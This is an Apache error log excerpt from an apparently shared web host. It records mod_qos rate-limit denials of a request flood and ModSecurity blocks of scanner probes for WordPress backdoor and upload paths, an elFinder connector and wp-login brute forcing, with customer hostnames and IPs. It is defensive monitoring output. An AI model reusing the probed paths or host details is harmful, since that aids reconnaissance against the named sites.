[Tue May 26 20:00:48.600615 2026] [qos:error] [pid 106517:tid 106732] [client 45.148.10.120:46374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pIgAAANY
[Tue May 26 20:00:48.600678 2026] [qos:error] [pid 106517:tid 106722] [client 45.148.10.120:46412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pIQAAAMw
[Tue May 26 20:00:48.602417 2026] [qos:error] [pid 106517:tid 106693] [client 45.148.10.120:46294] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pIwAAAK8
[Tue May 26 20:00:48.607663 2026] [qos:error] [pid 106517:tid 106735] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pJAAAANk
[Tue May 26 20:00:48.611270 2026] [qos:error] [pid 106517:tid 106651] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pJgAAAIY
[Tue May 26 20:00:48.622216 2026] [qos:error] [pid 106517:tid 106674] [client 45.148.10.120:46326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pJwAAAJ0
[Tue May 26 20:00:48.625053 2026] [qos:error] [pid 106517:tid 106719] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pKAAAAMk
[Tue May 26 20:00:48.663101 2026] [security2:error] [pid 112029:tid 112221] [client 103.163.220.43:31283] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/xmlrpc.php"] [unique_id "ahWumKFW0C-ajaCsyFc8AAAAAUg"]
[Tue May 26 20:00:48.669830 2026] [security2:error] [pid 106517:tid 106747] [client 66.249.64.173:35696] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1oLwAAAOU"], referer: https://doyecpa.com/prizes/271509783%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 20:00:48.744769 2026] [qos:error] [pid 106517:tid 106693] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pLAAAAK8
[Tue May 26 20:00:48.746766 2026] [qos:error] [pid 106517:tid 106735] [client 45.148.10.120:46480] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pLQAAANk
[Tue May 26 20:00:48.753068 2026] [qos:error] [pid 106517:tid 106674] [client 45.148.10.120:46412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pLwAAAJ0
[Tue May 26 20:00:48.754341 2026] [qos:error] [pid 106517:tid 106719] [client 45.148.10.120:46374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pMAAAAMk
[Tue May 26 20:00:48.754986 2026] [qos:error] [pid 106517:tid 106733] [client 45.148.10.120:46294] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pMQAAANc
[Tue May 26 20:00:48.758260 2026] [qos:error] [pid 112029:tid 112265] [client 45.148.10.120:49466] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumKFW0C-ajaCsyFc8JAAAAXQ
[Tue May 26 20:00:48.762556 2026] [qos:error] [pid 106517:tid 106747] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pMgAAAOU
[Tue May 26 20:00:48.767074 2026] [qos:error] [pid 106517:tid 106662] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pMwAAAJE
[Tue May 26 20:00:48.774261 2026] [qos:error] [pid 106517:tid 106660] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pNAAAAI8
[Tue May 26 20:00:48.775545 2026] [qos:error] [pid 106517:tid 106742] [client 45.148.10.120:46326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pNQAAAOA
[Tue May 26 20:00:48.924746 2026] [qos:error] [pid 106517:tid 106747] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pOQAAAOU
[Tue May 26 20:00:49.175272 2026] [security2:error] [pid 106517:tid 106671] [client 103.163.220.28:46501] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-good.php"] [unique_id "ahWumYZZc2DoU1lPnP1pRQAAAJo"]
[Tue May 26 20:00:49.190231 2026] [qos:error] [pid 106517:tid 106693] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pRgAAAK8
[Tue May 26 20:00:49.193840 2026] [qos:error] [pid 106517:tid 106674] [client 45.148.10.120:46412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pRwAAAJ0
[Tue May 26 20:00:49.195221 2026] [qos:error] [pid 106517:tid 106711] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pSAAAAME
[Tue May 26 20:00:49.196235 2026] [qos:error] [pid 106517:tid 106733] [client 45.148.10.120:46294] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pSwAAANc
[Tue May 26 20:00:49.196354 2026] [qos:error] [pid 106517:tid 106719] [client 45.148.10.120:46374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pSQAAAMk
[Tue May 26 20:00:49.196639 2026] [qos:error] [pid 106517:tid 106694] [client 45.148.10.120:46480] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pSgAAALA
[Tue May 26 20:00:49.197775 2026] [qos:error] [pid 106517:tid 106747] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pTAAAAOU
[Tue May 26 20:00:49.198337 2026] [qos:error] [pid 112029:tid 112238] [client 45.148.10.120:49466] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumaFW0C-ajaCsyFc8MgAAAVk
[Tue May 26 20:00:49.202086 2026] [qos:error] [pid 106517:tid 106651] [client 45.148.10.120:46326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pTQAAAIY
[Tue May 26 20:00:49.202604 2026] [qos:error] [pid 106517:tid 106680] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pTgAAAKI
[Tue May 26 20:00:49.282448 2026] [security2:error] [pid 112029:tid 112173] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc76AAAARg"]
[Tue May 26 20:00:49.286914 2026] [security2:error] [pid 112029:tid 112197] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc76wAAATA"]
[Tue May 26 20:00:49.286932 2026] [security2:error] [pid 112029:tid 112198] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc75QAAATE"]
[Tue May 26 20:00:49.311548 2026] [security2:error] [pid 106517:tid 106766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1olAAAAPg"]
[Tue May 26 20:00:49.317204 2026] [security2:error] [pid 106517:tid 106730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1oaAAAANQ"]
[Tue May 26 20:00:49.317635 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1o2gAAALM"]
[Tue May 26 20:00:49.319665 2026] [security2:error] [pid 106517:tid 106740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1olgAAAN4"]
[Tue May 26 20:00:49.324079 2026] [security2:error] [pid 112029:tid 112232] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc77AAAAVM"]
[Tue May 26 20:00:49.332278 2026] [security2:error] [pid 112029:tid 112226] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc7ywAAAU0"]
[Tue May 26 20:00:49.334875 2026] [security2:error] [pid 112029:tid 112189] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc77QAAASg"]
[Tue May 26 20:00:49.337049 2026] [security2:error] [pid 106517:tid 106677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1ohQAAAKA"]
[Tue May 26 20:00:49.347072 2026] [security2:error] [pid 106517:tid 106741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1olQAAAN8"]
[Tue May 26 20:00:49.359725 2026] [security2:error] [pid 106517:tid 106687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1ogAAAAKk"]
[Tue May 26 20:00:49.361076 2026] [security2:error] [pid 106517:tid 106689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1o3QAAAKs"]
[Tue May 26 20:00:49.361941 2026] [security2:error] [pid 106517:tid 106709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1o3AAAAL8"]
[Tue May 26 20:00:49.372234 2026] [security2:error] [pid 106517:tid 106739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1o2AAAAN0"]
[Tue May 26 20:00:49.378554 2026] [security2:error] [pid 112029:tid 112282] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc76gAAAYU"]
[Tue May 26 20:00:49.379117 2026] [security2:error] [pid 112029:tid 112251] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc78gAAAWY"]
[Tue May 26 20:00:49.393774 2026] [security2:error] [pid 106517:tid 106726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1ooQAAANA"]
[Tue May 26 20:00:49.400918 2026] [security2:error] [pid 106517:tid 106703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1opgAAALk"]
[Tue May 26 20:00:49.410413 2026] [security2:error] [pid 106517:tid 106745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1o0wAAAOM"]
[Tue May 26 20:00:49.427316 2026] [security2:error] [pid 112029:tid 112200] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumKFW0C-ajaCsyFc8CgAAATM"]
[Tue May 26 20:00:49.427399 2026] [security2:error] [pid 112029:tid 112180] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc78QAAAR8"]
[Tue May 26 20:00:49.429944 2026] [security2:error] [pid 106517:tid 106714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1o8AAAAMQ"]
[Tue May 26 20:00:49.433806 2026] [security2:error] [pid 112029:tid 112245] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc74gAAAWA"]
[Tue May 26 20:00:49.436711 2026] [security2:error] [pid 112029:tid 112160] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumKFW0C-ajaCsyFc8CwAAAQs"]
[Tue May 26 20:00:49.451824 2026] [security2:error] [pid 112029:tid 112220] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumKFW0C-ajaCsyFc8BAAAAUc"]
[Tue May 26 20:00:49.451824 2026] [security2:error] [pid 106517:tid 106676] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1opAAAAJ8"]
[Tue May 26 20:00:49.547378 2026] [qos:error] [pid 112029:tid 112250] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWumaFW0C-ajaCsyFc8ZgAAAWU
[Tue May 26 20:00:49.556978 2026] [qos:error] [pid 106517:tid 106711] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pgQAAAME
[Tue May 26 20:00:49.560022 2026] [qos:error] [pid 112029:tid 112176] [client 45.148.10.120:46522] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumaFW0C-ajaCsyFc8aAAAARs
[Tue May 26 20:00:49.582041 2026] [qos:error] [pid 112029:tid 112165] [client 45.148.10.120:46486] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumaFW0C-ajaCsyFc8aQAAARA
[Tue May 26 20:00:49.582097 2026] [qos:error] [pid 106517:tid 106682] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pgwAAAKQ
[Tue May 26 20:00:49.582362 2026] [qos:error] [pid 106517:tid 106714] [client 45.148.10.120:46400] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1phAAAAMQ
[Tue May 26 20:00:49.589562 2026] [qos:error] [pid 106517:tid 106718] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1phQAAAMg
[Tue May 26 20:00:49.591004 2026] [qos:error] [pid 106517:tid 106741] [client 45.148.10.120:46444] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1phwAAAN8
[Tue May 26 20:00:49.608965 2026] [qos:error] [pid 106517:tid 106763] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1piAAAAPU
[Tue May 26 20:00:49.608968 2026] [qos:error] [pid 112029:tid 112159] [client 45.148.10.120:46498] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWumaFW0C-ajaCsyFc8bQAAAQo
[Tue May 26 20:00:49.680852 2026] [security2:error] [pid 106517:tid 106667] [client 103.163.220.9:39115] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/upload.php"] [unique_id "ahWumYZZc2DoU1lPnP1pjAAAAJY"]
[Tue May 26 20:00:49.699066 2026] [qos:error] [pid 112029:tid 112216] [client 45.148.10.120:46546] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumaFW0C-ajaCsyFc8cAAAAUM
[Tue May 26 20:00:49.707832 2026] [qos:error] [pid 106517:tid 106680] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pjQAAAKI
[Tue May 26 20:00:49.708035 2026] [qos:error] [pid 112029:tid 112282] [client 45.148.10.120:46522] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumaFW0C-ajaCsyFc8cQAAAYU
[Tue May 26 20:00:49.731817 2026] [qos:error] [pid 106517:tid 106743] [client 45.148.10.120:46400] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pjwAAAOE
[Tue May 26 20:00:49.733614 2026] [qos:error] [pid 112029:tid 112261] [client 45.148.10.120:46486] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumaFW0C-ajaCsyFc8cgAAAXA
[Tue May 26 20:00:49.738512 2026] [qos:error] [pid 106517:tid 106749] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pkAAAAOc
[Tue May 26 20:00:49.744863 2026] [qos:error] [pid 106517:tid 106682] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pkQAAAKQ
[Tue May 26 20:00:49.746331 2026] [qos:error] [pid 106517:tid 106714] [client 45.148.10.120:46444] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pkgAAAMQ
[Tue May 26 20:00:49.756459 2026] [security2:error] [pid 106517:tid 106718] [client 64.89.161.160:65191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 160.161.89.64.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/assets/admin/plugins/elfinder/connectors/php/connector.php"] [unique_id "ahWumYZZc2DoU1lPnP1pkwAAAMg"]
[Tue May 26 20:00:49.762288 2026] [qos:error] [pid 112029:tid 112239] [client 45.148.10.120:46498] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumaFW0C-ajaCsyFc8cwAAAVo
[Tue May 26 20:00:49.763377 2026] [qos:error] [pid 106517:tid 106741] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1plAAAAN8
[Tue May 26 20:00:49.851593 2026] [qos:error] [pid 112029:tid 112247] [client 45.148.10.120:46546] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumaFW0C-ajaCsyFc8dQAAAWI
[Tue May 26 20:00:49.855825 2026] [qos:error] [pid 112029:tid 112225] [client 45.148.10.120:46522] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumaFW0C-ajaCsyFc8dgAAAUw
[Tue May 26 20:00:49.858680 2026] [qos:error] [pid 106517:tid 106686] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pngAAAKg
[Tue May 26 20:00:49.870583 2026] [security2:error] [pid 112029:tid 112035] [remote 84.247.129.9:35672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.129.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWumaFW0C-ajaCsyFc8bwABPQU"]
[Tue May 26 20:00:49.881707 2026] [qos:error] [pid 106517:tid 106702] [client 45.148.10.120:46400] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pnwAAALg
[Tue May 26 20:00:49.886095 2026] [qos:error] [pid 112029:tid 112174] [client 45.148.10.120:46486] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumaFW0C-ajaCsyFc8dwAAARk
[Tue May 26 20:00:49.899059 2026] [qos:error] [pid 106517:tid 106742] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1poAAAAOA
[Tue May 26 20:00:49.900356 2026] [qos:error] [pid 106517:tid 106676] [client 45.148.10.120:46444] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1poQAAAJ8
[Tue May 26 20:00:49.906511 2026] [qos:error] [pid 106517:tid 106660] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1pogAAAI8
[Tue May 26 20:00:49.917087 2026] [qos:error] [pid 106517:tid 106732] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumYZZc2DoU1lPnP1ppQAAANY
[Tue May 26 20:00:49.917361 2026] [qos:error] [pid 112029:tid 112244] [client 45.148.10.120:46498] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumaFW0C-ajaCsyFc8eAAAAV8
